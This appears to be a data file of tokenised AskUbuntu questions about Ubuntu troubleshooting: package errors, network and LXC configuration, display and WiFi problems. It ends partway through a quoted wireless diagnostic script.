516810	lubuntu desktop preferences is gone	i hope someone can help me . `` desktop preferences '' is gone . i use lubuntu and i cant cant open desktop preferences . when i click , comes a error message : `` desktop administrato is not active '' i 've tried sudo apt-get install -- reinstall lubuntu-desktop , but doesnt works , then i tried : https : //help.ubuntu.com/community/lubuntu/pcmanfm now , i think that i have a problem with pcmanfm ...
516811	package operation failed	so , after an update to 14.04 it 's been running okay for some time and then the errors came in . i was suddenly unable to install packages . the usual automatic updates thing just kept failing with 'package operation failed ' but after clicking ok it said 'all software is up to date ' so i have no idea what 's up with that . while writing this i 've tried : sudo apt-get clean sudo apt-get update and here 's the output of sudo apt-get -f install ( after those 2 cmds above ) : ( i 've removed the sudo password thing ) reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : kde-l10n-engb kde-l10n-sk libirrlicht1.8 libjsoncpp0 libluajit-5.1-2 libluajit-5.1-common linux-headers-3.13.0-24 linux-headers-3.13.0-24-generic linux-image-3.13.0-24-generic linux-image-extra-3.13.0-24-generic minetest-data use 'apt-get autoremove ' to remove them . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/17,0 kb of archives . after this operation , 0 b of additional disk space will be used . dpkg : error processing package ntrack-module-libnl-0 ( -- configure ) : package is in a very bad inconsistent state ; you should reinstall it before attempting configuration errors were encountered while processing : ntrack-module-libnl-0 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it shows some errors some messed up packages so please , if you have any ideas how to fix this package error i would love to hear them < 3 ( i 'm a complete noob with ubuntu so please consider that while writing your responses )
516813	nvidia gtx 780- windows going black when minimizing/maximizing	maybe some of you who are using the nvidia drivers know of this problem . everytime i minimize my windows they are going black when they `` fade '' into the unity launcher . no big deal . does n't look that neat but i can deal with it . but the frustrating part is that when i maximize them again , 9 out of 10 times they 're all black or bugged . this problem has been haunting me sinds 12.10 . i 've googled it many times and found lots of launchpad bug entries but still no solution . does somebody know a workaround or fix ? it 's about time they fix this issue . regards , mcgloud
516815	are there cases where vi is the only option ?	are there scenarios where vi is the only option to create , edit or modify a file in an ubuntu environment ? my question is basically to really know if there is such a case where i would be forced to use vi because it would be the only option available in a particular case in the ubuntu ecosystem . could a particular case exist where i somehow would not have access to other options like nano , pico or simply sending the information with tools like cat , sed , tee and more ? i would assume this is more of a server or cloud side since on the desktop there are many more options , but from anybody that uses the terminal a lot i ask : is there such a case ?
516816	thinkpad t410 keyboard layout ?	i have installed ubuntu 14.04 on my lenovo t410 thinkpad but i 'm getting some strange 'shortcut key behaviour . for instance the fn key puts the computer in suspend , alt closes the active window and several keys seem to be linked , so for instance if i look at the keyboard layout chart 3 and prntscr are highlight together when pressed , so every time i type 3 it takes a screenshot ! any ideas how to rectify this would be welcome as it 's very frustrating .
516826	ca n't configure network interfaces ubuntu 14.04	i recently just uninstalled network manager and i 'm trying to configure a wlan0 for internet connection while having eth0 for a multicast route . currently my /etc/network/interfaces file looks like this : auto wlan0 iface wlan0 inet dhcp wireless-essid ztc-f0 wireless-key 001a70d2c61a wireless-channel 6 wireless-mode managed auto eth0 iface eth0 inet static address 10.251.235.165 netmask 255.255.255.252 post-up route add -net 10.251.0.0/16 gw 10.251.235.164 dev eth0 post-up route add -net 232.0.0.0/8 gw 10.251.235.164 dev eth0 when i try to ifup wlan0 it says `` no dhcpoffers recieved '' when i try to ifup eth0 it just says rtnetlink answers : file exists failed to bring up eth0 can anyone help ?
516828	raid scaling using mdadm	i have 3 equally-sized hard drives . i would like to use mdadm to do software raid scaling on these . is this possible in ubuntu 12.04 ? is there another tool i should use ?
516836	`` error getting file : -6 : not supported '' error copying from mtp device	i have htc droid dna with the firmware of htc one m8 and it only allows to use mtp file transfer protocol . i can copy some files , but on the majority of them im getting `` error getting file : -6 : not supported '' error . now im transferring files via ftp server , but it is very slow and i would like to fix this problem . i have ubuntu 14.04 lts installed . are there any solutions ? thanks .
516837	add scsi drive support in ubuntu	i need to attach an old scsi drive ( hp model st373454lw , 73 gb ) to an ubuntu 14.04 machine . i 'm attaching the drive through the forensic bridge ultrabay ii . while the bridge recognizes the scsi drive just fine , it does not detect the host ( i.e . the ubuntu machine ) . the bridge is attached internally via a sata type a connector and powered via a molex-to-sata connection . what can i do to get the ubuntu to machine to recognize this drive ? i can not partition or format the target drive , the data must be transferred . it seems from make xconfig that general scsi support is enabled :
516840	the package information displayed by ubuntu software-center is 17 days back and counting	while re-opening my ubuntu 12.04 machine after a 2 weeks vacations , and successfully using the update manager to update my applications i see that the package information was last updated 17 days ago . press the check button below to check for new software updates after an update the package information should have been updated minutes ago . how do i force the update of the package information ? i already had the problem and i know there is a file to remove or rename in the file system /var ( ? ) something however i do n't remember which one . thanks @ eliah kagan , running $ sudo apt-get update did turn up one error related to a missing public key from an update of qgis [ qgis.org ] e.g . w : gpg error : http : //qgis.org precise release : the following signatures could n't be verified because the public key is not available : no_pubkey bba6491f47765b75 the solution was to run $ sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys bba6491f47765b75 then the cmd . line returned no error and the update manager displayed the package information was just updated . the question is solved . thanks .
516841	network has disappeared on menu	i have ubuntu 12.04 lts iam suprised because it has network menu on global menu has disappreared . what to do in order to bring it back ?
516843	installing ubuntu 14.04.1 alongside windows 8.1	i have a pretty recent ( 2013 ) hp laptop with windows 8.1 . i would like to install ubuntu 14.04.1 alongside it but from what i can gather new machines with windows 8.1 have obstacles such as secure boot and something called uefi . can anyone tell me how the process works and what workarounds i may have to do ? i 'm really in the dark here and need some clear explaining . thanks !
516844	is sim a shell script command ?	i was creating a sym-link for practice in ubuntu 14.04 . i meant to use this command : ln -s ../fun dir1/fun-sym it was taken from a book i am using . except i used sim at the end by mistake . so the last was /fun-sim . the command was accepted and it seemed to make 2 links . i also put in the correct command . using ls -l it did show both as being links . they lines look the same except for the sim and sym . lrwxrwxrwx 1 julios julios 3 aug 27 12:58 fun-sim - > fun and lrwxrwxrwx 1 julios julios 3 aug 27 13:11 fun-sym - > fun . using this command ls -li it showed one number difference in the inode , 684226 & 684227 . i am learning and lost but it caught my attention when it seemed to create a link . i thought there would have been an error message of some kind . no idea how to test it . i tried man sim and got this response : no manual entry for sim . that seems to be the answer for no such command . i got the same response for go , jump and please . no problem was caused . what caught my attention was that it worked at all when it should have failed . maybe one of the ways programming errors happen , typos . anyway , it was interesting to me but i am just trying to find my way around the command line .
516845	how can i wipe my hard drive from the debian command line to install ubuntu to a blank hard drive ?	so here 's my dilemma . i tried to install debian and it wiped out windows entirely after i installed the grub bootloader . thinking , `` ok , i 'll just get it back after i finish installing debian , '' i completed the installation and the final product turned out to be just a command line . i 'm currently trying to install gnome for the gui , but in case that does n't work for whatever reason , is there a way to uninstall the entire debian os from its own command line , and from here would i still be able to install ubuntu ? the only reason i 'm concerned about deleting debian is because when i popped in a windows or ubuntu iso to the bios boot menu , it came up with an error containing the phrase , `` syslinux '' so clearly it knows that linux is already installed . i believe it also said `` can not find kernel image . '' is there any workaround for this ? thanks in advance .
516847	set mouse scroll as shortcut for just one application ?	i 'm using unity in ubuntu 14.04 , but since i ca n't put the unity dock on the bottom of the screen , i 've set it to hide and set the sensitivity low enough that my mouse ca n't activate it and slide it out . in place of the unity dock , i now use the cairo-dock , but the cairo-dock changes apps if the scroll wheel is bumped . there 's no way that i can find to disable the scroll wheel app switching , so i 'd like to know if there is a way to bind the scroll wheel to a system shortcut only when the mouse is over the cairo-dock . i 've already bound ctrl + scroll-wheel to /bin/true system wide to disable zooming in every app using .xbindkeysrc , but i do n't know if there 's a way to set things like this up on a per application basis . does anyone know definitively if this is possible ?
516849	what wifi adapter does linux need ?	does anyone know what wireless adapter linux needs to work wifi ? cause linksys does not work . it brings up a cd and then when i click the cd and its just a bunch of files . so is there another wireless adapter useable ?
516850	is there any way to install multiple software at a single command via terminal ?	i just want to know after install ubuntu newly it`s need to install previous essential software again , that is really time consuming so is there any way that i write command and my essential software download and install automatically .
516851	adding white to a transparent background in gimp	ok , i can not for the life of me find an answer to this . everyone seems to want to create a transparent background . so i 'm using inkscape to create a logo , but to get it sized correctly , i 'm opening it in gimp . the image is showing as white , i 've added a white background layer and everything , but when i go to upload it ( it 's an image for a header on my website ) the background is still transparent . i 've even tried just doing a screenshot of the image with the white background showing , but when i upload it to my site it 's gray again . sheesh , right ? any ideas for why this refuses to show up white ? also , if you know how to just size it properly in inkscape , maybe that 's easier .
516860	openstack : vms exchanging multicast on eth1 fail when one suffers igmp timeout	i have two identical trusty vms configured with dhcp for eth1 . i installed mgen and configured the mgen scripts to have the two exchange 1 multicast message per second for 360 seconds . one vm stops receiving packets after 260 seconds ( the igmp snooping group timeout ) . the second vm keeps receiving messages for the entire period . i experience the same problem if i use identical centos 6.5 vms . why does one work ? why does the other timeout and never recover ? setup ; via havana dashboard , i created a network with a 10.16.1/24 subnet , disabled gateway , enabled dhcp with range 10.16.1.100,10.16.1.120 . launched 2 trusty instances , each with two nics ; eth0 for my regular public interface , and eth1 for the 10.16.1/24 subnet . logged into each vm and created eth1.cfg , configured for dhcp auto eth1 iface eth1 inet dhcp ifup eth1 on each vm apt-get install mgen on each vm configure one vm with this mgen script 0.0 join 224.225.1.104 interface eth1 0.0 listen udp 5104 10.0 on 1 udp src 5002 dst 224.225.1.103/5103 periodic [ 1 512 ] 370.0 leave 224.225.1.104 370.0 off 1 configure the other vm with complimentary script 0.0 join 224.225.1.103 interface eth1 0.0 listen udp 5103 10.0 on 1 udp src 5002 dst 224.225.1.104/5104 periodic [ 1 512 ] 370.0 leave 224.225.1.103 350.0 off 1 set route on each vm ip route add 224.225.1/24 dev eth1 run script on each vm simultaneously mgen input mcast.mgn as mgen runs it prints out the messages received from the other vm . one vm gets to 260 seconds , and stops receiving ; 18:50:35.414601 recv proto > udp flow 1 seq 251 src 10.16.1.103/5002 dst 224.225.1.103/5103 sent 18:50:35.304360 size 512 18:52:04.672731 off flow 1 srcport 5002 dst 224.225.1.104/5104 the other completes as expected ; 18:52:04.563455 recv proto udp flow 1 seq 341 src 10.16.1.104/5002 dst 224.225.1.104/5104 sent 18:52:04.672341 size 512 18:52:05.305505 off flow 1 srcport 5002 dst 224.225.1.103/5103 what gives ? update using wireshark on the successful vm shows the following igmp traffic . note the successful vm is using igmpv2 , while the failing one uses igmpv3 . i do n't understand this as vms are created identically - same base image - same configuration commands - etc.. also , performed wireshark capture from the failing vm . interestingly , it does not capture any of the igmpv2 packets . this probably explains why it never responds to the membership query . according to this post , igmpv3 should be backwards compatible to v2 . however , i did use this information to force the failing vm to also use igmpv2 , and performed another wireshark capture . the result was that the failing vm still does not receive the igmp membership query .
516864	ca n't access second nic	i have 2 nics with the primary em1 the other is p3p1 . it appears from ifconfig dmesg that both are up and working but i ca n't access p3p1 from my java test application . no joy with ping either . both nics attach to the same router . how do i configure the 2nd nic ? /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface ( first nic ) auto em1 iface em1 inet static address 192.168.1.211 gateway 192.168.1.1 netmask 255.255.255.0 dns-nameservers 99.99.99.53 8.8.8.8 8.8.4.4 # secondary network interface ( second nic ) auto p3p1 iface p3p1 inet static address 192.168.1.219 gateway 192.168.1.1 netmask 255.255.255.0 dns-nameservers 99.99.99.53 8.8.8.8 8.8.4.4 ifconfig p3p1 ( tx does not increase when i try to use this nic ) p3p1 link encap : ethernet hwaddr 00:01:05:19:7d:59 inet addr:192.168.1.219 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :201:5ff : fe19:7d59/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1211 errors:0 dropped:0 overruns:0 frame:0 tx packets:83 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:250945 ( 250.9 kb ) tx bytes:10417 ( 10.4 kb ) memory : f7b00000-f7b20000 ping attempts $ ping -i em1 www.google.com ping www.google.com ( 173.194.115.49 ) from 192.168.1.211 em1 : 56 ( 84 ) bytes of data . 64 bytes from dfw06s40-in-f17.1e100.net ( 173.194.115.49 ) : icmp_seq=1 ttl=52 time=79.6 ms 64 bytes from dfw06s40-in-f17.1e100.net ( 173.194.115.49 ) : icmp_seq=2 ttl=52 time=78.5 ms programmer @ fireimager : ~ $ ping -i em1 www.google.com ping www.google.com ( 173.194.115.49 ) from 192.168.1.211 em1 : 56 ( 84 ) bytes of data . 64 bytes from dfw06s40-in-f17.1e100.net ( 173.194.115.49 ) : icmp_seq=1 ttl=52 time=79.6 ms 64 bytes from dfw06s40-in-f17.1e100.net ( 173.194.115.49 ) : icmp_seq=2 ttl=52 time=78.5 ms check dmesg $ dmesg | grep p3p1 [ 0.782582 ] systemd-udevd [ 145 ] : renamed network interface eth0 to p3p1 [ 1.480015 ] ipv6 : addrconf ( netdev_up ) : p3p1 : link is not ready [ 2.777001 ] ipv6 : addrconf ( netdev_up ) : p3p1 : link is not ready [ 25.427365 ] igb : p3p1 nic link is up 1000 mbps full duplex , flow control : rx/tx [ 25.427829 ] ipv6 : addrconf ( netdev_change ) : p3p1 : link becomes ready [ edit ] $ ping -i p3p1 -c 3 www.google.com ping www.google.com ( 173.194.115.114 ) from 192.168.1.219 p3p1 : 56 ( 84 ) bytes of data . from 192.168.1.219 icmp_seq=1 destination host unreachable from 192.168.1.219 icmp_seq=2 destination host unreachable from 192.168.1.219 icmp_seq=3 destination host unreachable -- - www.google.com ping statistics -- - 3 packets transmitted , 0 received , +3 errors , 100 % packet loss , time 2014ms pipe 3 ping ping -i p3p1 -c 3 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) from 192.168.1.219 p3p1 : 56 ( 84 ) bytes of data . -- - 192.168.1.1 ping statistics -- - 3 packets transmitted , 0 received , 100 % packet loss , time 2016ms ethtool $ ethtool p3p1 settings for p3p1 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : symmetric supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : symmetric advertised auto-negotiation : yes speed : 1000mb/s duplex : full port : twisted pair phyad : 1 transceiver : internal auto-negotiation : on mdi-x : on ( auto ) can not get wake-on-lan settings : operation not permitted current message level : 0x00000007 ( 7 ) drv probe link link detected : yes tcptraceroute $ sudo tcptraceroute -ne 73.169.96.7 -p 4958 -i p3p1 selected device p3p1 , address 192.168.1.219 , port 4958 for outgoing packets tracing the path to 73.169.96.7 on tcp port 80 ( http ) , 30 hops max 1 adsl-99-15-69-107.dsl.irvnca.sbcglobal.net ( 99.15.69.107 ) 0.575 ms 0.490 ms 0.537 ms 2 * * * kernel routes $ $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 em1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 em1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 p3p1 [ edit ] followed advice but fireshark is not showing any traffic with ping -i 73.169.96.7 sudo route add 73.169.96.7 p3p1 $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.1.1 0.0.0.0 ug 0 0 0 em1 73.169.96.7 0.0.0.0 255.255.255.255 uh 0 0 0 p3p1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 em1 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 p3p1
516866	configure lxc with additional ip ubuntu 14.04	i 'm still looking for answer on my question . i have a dedicated server with ubuntu server 14.04 , and 2 public ip . i want to add 1 public ip per 1 lxc . i think i 've tried everything and nothing helped me : ( . after install fresh system i got default : root @ h0st : ~ # cat /etc/network/interfaces auto eth0 iface eth0 inet static address 94.23.237.216 netmask 255.255.255.0 network 94.23.237.0 broadcast 94.23.237.255 gateway 94.23.237.254 lxc configuration : root @ h0st : ~ # cat /var/lib/lxc/oksymoron/config lxc.rootfs = /var/lib/lxc/oksymoron/rootfs lxc.mount = /var/lib/lxc/oksymoron/fstab lxc.utsname = oksymoron lxc.arch = amd64 lxc.network.type = veth lxc.network.flags = up lxc.network.link = eth0 lxc.network.hwaddr = 00:16:3e : e0:1b:5d cat /var/lib/lxc/oksymoron/rootfs/etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp and as i mentioned i got 2 additional ip 's : 91.121.239.228/32 , 188.165.139.63/32 someone can help me ?
516867	how to display the skype indicator on the status top-bar ?	how do i to display the skype indicator on the top bar , please ? i 'm actually running ubuntu 14.04 lts with unity . architecture : 64 bits . and , i have n't customized my theme . i 've tried to follows these tips , but i 've got nothing in response . thanks in advace !
516868	windows minimised to just the top-bar	i am fairly click-happy and as such , i have no-idea how i did it ... this is firefox , and my only option is seemingly to close the window/launch a new one . can anybody help ?
516873	dual monitor problem on gnome shell	i have ubuntu 14.04 with unity and have installed two other desktops for it ( lubuntu and gnome-shell ) . after the installation of these two , i could easily log in and out of each session of these desktops and still have both my monitors working . after the recent update , i had to reboot my system . afterwards , dual monitor stopped working . i managed to make it work in lubuntu with arandr but i still have problem with gnome-shell . here is the problem : if both monitors are attached and i log into a gnome-shell session . it will be unresponsive : it wo n't show anything except for the background image . but i can still use other ttys . if i login with only one monitor connected . i works correctly . then , if i connect the other monitor and try to detect it ( either by xrandr or using gui ) the image of both monitors will be distorted . the systems would still be responsive and i can get back to my one monitor setting by disconnecting the second monitor and running xrandr again . any idea how to fix it ?
516876	how to connect my wireless epson wf-2540 to my laptop that is running ubuntu 14.04 lts os	i downloaded ubuntu 14.04 lts os on my laptop a couple of months ago . i just bought a wireless epson wf-2540 all in one ( printer , scanner , fax , and copier ) a week ago . i have the printer hooked up to my desk top , my kids laptop using the network option . i can not for the life of me figure out how to get this printer working or installed onto my laptop that has ubuntu downloaded on to it . i have tried everything that i can think of . can someone please explain to me step by step on how to either download or run the installation cd that came with the printer onto my laptop that is running ubuntu 14.04 . thank you all in advance ! !
516881	lubuntu 14.04 - ca n't connect via wi-fi after deleting and re-creating connection	i had a wi-fi connection to my amped apa20 access point working fine , but i deleted the connection and when i re-created it , now lubuntu wo n't connect . nothing else on the system has changed . could the system have information in a file somewhere which is preventing the re-created connection from working ? i created a new wi-fi connection using my cell phone as a mobile hotspot , temporarily , which works fine . [ additional info : i had the apa20 set to not broadcast the ssid . when i set it to broadcast , the wi-fi connection is seen by lubuntu and it connects . this is contrary to past experience , though- i have been able to connect to hidden ( non-broadcast ) wi-fi networks before . update- when i set the apa20 back to not broadcasting the ssid , lubuntu can now connect to the network . why it can connect now and could n't before is somewhat of a mystery . ]
516882	e : unable to locate package mkinitrd	root @ cliu-hp-zbook-15 : / # apt-get install mkinitrd reading package lists ... done building dependency tree reading state information ... done e : unable to locate package mkinitrd can somebody tell how to install mkinitrd ?
516884	use web page or html file as a screensaver ?	i heard that xscreensaver can run anything as a screensaver but i do n't know how to do so . can i use it to make a web page from an html file my screensaver ?
516885	just installed ubuntu on my macbook pro . now my screen randomly goes black during use	just installed ubuntu on my macbook pro ( 15 inch mid 2010 ) today and i am running into an issue where my screen will just go black and it almost seems like the computer shuts down suddenly . the backlit keyboard is still on so i know the computer is n't off but everything else seems unresponsive . i do n't know what the cause of this is . i have checked the heat sensors and they all seem ok and i can not find any consistency in what may trigger this happening . any help would be appreciated .
516889	mount error on opening	i have n't used ubuntu for long time so i forgot most of command and how to fix issues . i have dual boot , windows 8 and ubuntu latest version i use ubuntu for my work and windows for gaming and other stuff . unable to access âmain [ g-e ] â error mounting /dev/sda2 at /media/semary/main [ g-e ] : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda2 '' `` /media/semary/main [ g-e ] '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i already turn off fast startup on widows 8
516894	is it unsafe if , under single user mode , root password can be reset ?	is it unsafe if , under single user mode , root password can be reset ? then everyone can reset my root password !
516897	network unclaimed for built in dell latitude c port 2 ethernet ( 3com 3c920 )	i have an ancient computer - a piii based dell latitude cpxj attached to a c port 2 docking station . i believe i installed dapper on it and upgraded it up to intrepid . i tried learning linux on the machine but also used it as file and print server . it has a xircom ethernet/modem card in the pcmcia slot but i connected it to my network using the built in ethernet port on the docking station ( 3com 3c920 10/100 ethernet nic ) . in the course of my messing around with ubuntu - i was ambitious enough to try setting up a fax service on the machine - and messed up the whole shebang so much so that my update manager would never pop up and anything i minimized never went to the taskbar . never having upgraded from ibex , my system was in stasis until a couple of weeks ago . i tried manually starting update manager and succeeded . updated some files and after reboot , i lost my ethernet connection . not even the xircom was firing up . i chalked it up as the system was so compromised , i probably needed to reinstall the os - i went back to my archives and found my old dapper cds and tried to reinstall . nothing - hopefully it was just the media - but since i was going to reinstall might as well use one that is apt for such an old machine . i installed puppy - initially , i was working off the built in nic but for some reason , that connection got lost . puppy recognized the xircom card at least and i was able to work from there . i was willing to live with the xircom until i discovered that the connection was not persistent . i tried transferring a 10gb file and it stopped before it reached 1gb and appeared that it was disconnected . i said - maybe it 's puppy - let me try ubuntu again - after a few burned discs - i used the alternative iso and was finally able to make a clean install of precise . it still only recognizes the xircom but not the built in nic . lshw shows that the ethernet is unclaimed . i manually added the 3c59x module to startup and i know it loads because i see it when i lsmod . i checked the blacklist as well and the 3c59x driver was not in there . i havent changed anything in the bios , specially the irq settings as well . so to recap - irq is ok , modules are loaded , blacklist is negative but ethernet is still showing unclaimed . i have the linux drivers and tried installing but got an error that said the driver was not built for the kernel ( 3.2.26 ? ) . i tried the ubuntu manual which talked about adding vx , ep or ie but could not find those drivers . apologies for the long story - but the question is - is there anything else i can do ?
516899	how do i stream computer audio only with ffmpeg ?	i am using this script : http : //www.thegameengine.org/miscellaneous/streaming-twitch-tv-ubuntu/ to stream to twitch . it works but i do n't want to stream my microphone , only the computer audio . how should i change the script to achieve that ?
516900	how can i wait for ipv6 availability in a cloud-init script , to launch a docker box ?	i 'm using ubuntu v12.04 in aws , using an ami that 's nothing more than docker and the core ubuntu operating system . the upstart script packaged with docker.io starts on ipv4 availability : start on ( local-filesystems and net-device-up iface ! =lo ) here 's the upstart cookbook for reference . i am , however , using aws userdata to seed cloud-init with a small script , the idea being that when this instance comes up , it should map a certain port to docker and launch a docker box : # ! /usr/bin/env sh exec > > ( tee /var/log/user-data.log|logger -t user-data -s 2 > /dev/console ) 2 > & 1 docker run -p 1234:1234 myregistry.com/mybox unfortunately , that fails every time i start a new instance . dmesg is telling me this : [ 73325799.215935 ] init : plymouth-upstart-bridge main process ( 719 ) killed by term signal [ 73325799.825258 ] type=1400 audit ( 1409171854.798:13 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' docker-default '' pid=895 comm= '' apparmor_parser '' [ 73325800.954615 ] eth0 : no ipv6 routers present [ 73325809.438863 ] docker0 : no ipv6 routers present it would seem that cloud-init runs my docker run command before ipv6 is available . what 's interesting is that if i ssh up to the box and run the docker command manually , it then succeeds : [ 73326865.215761 ] netlink : 1 bytes leftover after parsing attributes . [ 73326865.217508 ] device veth9320 entered promiscuous mode [ 73326865.225057 ] addrconf ( netdev_up ) : veth9320 : link is not ready [ 73326865.240820 ] addrconf ( netdev_change ) : veth9320 : link becomes ready [ 73326865.240851 ] docker0 : port 1 ( veth9320 ) entering forwarding state how can i wait for ipv6 availability in the cloud-init script ? i tried just sleep 30 to wait out the network connection , but that does n't appear to work . an alternative question might be , `` can i force docker to use ipv4 ? `` , but that could be beyond the scope of this specific question .
516902	s.o.s : a stubborn case of 14.04 wifi problem !	i 've been sufferring ever since i installed a fresh version of trusty 64-bit on acer aspire 1410 netbook ( intel celeron , centrino n-1000 wifi device ) problem : unable to reconnect to wifi until total rebooting of ubuntu . description : this problem is intermittent ( i.e . does n't happen all the time , could not find a certain pattern to pinpoint a certain aspect to follow up with , but it did n't happen before upgrading : i use hibernate & suspend a lot ( to preserve the state of open apps without having to restart . hibernation is disabled by default so i had to re-enable it again . i either close the lid or hibernate with wifi on and connected , and when the pc comes back from sleep it just goes into an endless loop of trying to negotiate authentication with my router , it only happens sometimes and not all the time , and not always after resuming from sleep ( router restart due to electricity sometimes causes it ) . i 've digged into dozens of variations regarding 14.04 wifi problem and tried many solutions with no avail : only restarting my pc would resolve it and retain connection as normal . the scanning report from wireless_scan script can be found here . please help or else the frustration is forcing me to reconsider going back to windows after being a loyal and happy ubuntu user for years now . many thanks in advance @ theschwa i do n't recall from which forum page i downloaded it but here it is : # ! /bin/bash # # copyright ( c ) 2012 # # authors : wild man , krytarik # helpers : chili555 # experimental parts ( still buggy ) added by : varunendra # # this script gathers the infos necessary for troubleshooting a wireless # connection and saves them in a text file , wrapping it in an archive if it # exceeds the size limit of 19.5 kb for .txt files on the ubuntu forums . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # this program is free software : you can redistribute it and/or modify # it under the terms of the gnu general public license as published by # the free software foundation , either version 3 of the license , or # ( at your option ) any later version . # # this program is distributed in the hope that it will be useful , # but without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the # gnu general public license for more details . # # you should have received a copy of the gnu general public license # along with this program . if not , see < http : //www.gnu.org/licenses/ > . # filebase= '' wireless-info '' modmatches= '' ( air|ar5|ath [ ^3 ] |carl|at7|ipw|iwl|rt [ 23567l ] |r ( 818|871 ) |8192 [ cd ] |r92su|ssb|wl|b43|bcma|brcm|ndis|eth [ 1-9 ] |firm|etwork ) [ ^ [ : punct : ] ] * '' clear printf `` \n **** please wait while the script generates the report **** if this takes more than 1 minute , you may abort the script by pressing \ '' ctrl+z\ '' on your keyboard . ( type your login password when asked , then press 'enter ' ) \n\n '' exec 3 > & 1 4 > & 2 exec 1 > $ filebase.tmp 2 > /dev/null if [ `` $ ? '' ! = `` 0 '' ] ; then printf `` \ncould not write target file \ '' $ filebase.txt\ '' , aborting.\n\n '' exit 1 fi fill= $ ( printf `` % .1s '' `` ~ '' { 1..36 } ) fmt= '' \n % .36s\n '' # # wireless-info start printf `` \n\t======== wireless-info start ========\n '' printf `` $ fmt\n '' `` system-info $ fill '' printf `` $ ( uname -nrm ) , $ ( lsb_release -dcs | sed '/ $ / { n ; s : \n : , : } ' ) \n '' cpu= $ ( grep -m1 'model name ' /proc/cpuinfo ) ; cpu= $ { cpu # * : } mem= $ ( free -m | awk 'nr==2 { print $ 2 } ' ) printf `` \ncpu : $ cpu\nmemory : $ mem mb\nuptime : '' uptime # # lspci printf `` \n $ fmt\n '' `` lspci $ fill '' lspci -nnk | grep -ia2 net # # lsusb printf `` \n $ fmt\n '' `` lsusb $ fill '' lsusb # # pcmcia card info printf `` \n $ fmt\n '' `` pcmcia card info $ fill '' pccardctl info # # iwconfig printf `` \n $ fmt\n '' `` iwconfig $ fill '' iwconfig # # rfkill printf `` \n $ fmt\n '' `` rfkill $ fill '' rfkill= $ ( rfkill list all ) if [ `` $ rfkill '' ] ; then width= $ ( grep ^ [ 0-9 ] < < < `` $ rfkill '' | wc -l ) printf `` % -*s % s % s '' $ width `` interface '' `` soft blocked '' `` hard blocked '' while read line ; do if [ $ ( grep -o ^ [ 0-9 ] < < < `` $ line '' ) ] ; then printf `` \n % - $ width.40s `` `` $ line '' elif [ $ ( grep -o '^soft ' < < < `` $ line '' ) ] ; then printf `` % -14s '' `` $ { line # * : } '' else printf `` % s '' `` $ { line # * : } '' fi done < < < `` $ rfkill '' fi # # lsmod printf `` \n\n $ fmt\n '' `` lsmod $ fill '' lsmod= $ ( lsmod | egrep `` ( ^| [ [ : punct : ] ] ) ( $ { modmatches } |wmi ) ( [ [ : punct : ] ] | $ ) '' ) printf `` $ lsmod\n '' # # module parameters printf `` \n $ fmt '' `` module parameters $ fill '' modules= $ ( awk ' { print $ 1 } ' < < < `` $ lsmod '' ) while read line do if [ -d /sys/module/ $ line/parameters ] ; then printf `` \n % -12s % 4s : `` `` $ line '' `` ( $ ( ls -1 /sys/module/ $ line/parameters | wc -l ) ) '' parms= $ ( grep -h [ [ : graph : ] ] /sys/module/ '' $ line '' /parameters/* ) parms= $ ( while read i ; do printf `` $ { i # # */ } | `` ; done < < < `` $ parms '' ) parms= $ { parms// : /= } ; parms= $ { parms % | } printf `` $ parms '' fi done < < < `` $ modules '' | sort -d # # nm-tool printf `` \n $ fmt\n '' `` nm-tool $ fill '' nmtool= $ ( nm-tool | egrep -v '^net|^ $ |^ ( cap|ipv|wir| car ) ' | \ sed -r '/^- device : / s/ ( [ [ : alnum : ] ] [ [ : alnum : ] ] : ) { 5 } [ [ : alnum : ] ] [ [ : alnum : ] ] / < bt device > / ' ) f1= $ ( ( $ ( grep -o '^- device : . * - ' < < < `` $ nmtool '' | wc -l ) -10 ) ) ; if [ $ f1 -lt 16 ] ; then f1=16 ; fi f2= $ ( ( $ ( grep '^ type ' < < < `` $ nmtool '' | wc -l ) -19 ) ) ; if [ $ f2 -lt 6 ] ; then f2=6 ; fi f3= $ ( ( $ ( grep '^ driver ' < < < `` $ nmtool '' | wc -l ) -19 ) ) ; if [ $ f3 -lt 8 ] ; then f3=8 ; fi f4= $ ( ( $ ( grep '^ state ' < < < `` $ nmtool '' | wc -l ) -19 ) ) ; if [ $ f4 -lt 8 ] ; then f4=8 ; fi # f4=14 ; f5=9 ; f6=11 ; f7=11 ; f8=14 # state , default , mac id , speed , wep/wpa/wpa2 width= $ ( ( f1+f2+f3+f4+f5+f6+f7+f8+7 ) ) p1= $ ( printf ' % 0.1s ' `` = '' { 